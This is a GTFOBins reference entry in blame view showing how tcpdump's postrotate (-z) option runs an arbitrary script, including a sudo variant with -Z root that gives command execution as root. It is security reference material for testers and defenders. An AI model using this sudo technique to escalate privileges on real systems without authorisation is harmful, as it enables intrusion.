GTFOBins.github.io/_gtfobins/tcpdump.md

22 lines
704 B
Markdown
Raw Normal View History

2018-08-17 17:16:09 +02:00
---
2019-09-22 12:01:15 +02:00
description: |
These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
2018-08-17 17:16:09 +02:00
functions:
2018-10-05 19:55:38 +02:00
command:
2018-08-19 10:31:04 +02:00
- code: |
2018-09-07 00:29:58 +02:00
COMMAND='id'
TF=$(mktemp)
2018-08-19 10:31:04 +02:00
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
2018-10-05 19:55:38 +02:00
sudo:
2018-08-19 10:31:04 +02:00
- code: |
2018-09-07 00:29:58 +02:00
COMMAND='id'
TF=$(mktemp)
2018-08-19 10:31:04 +02:00
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
2018-08-17 17:16:09 +02:00
---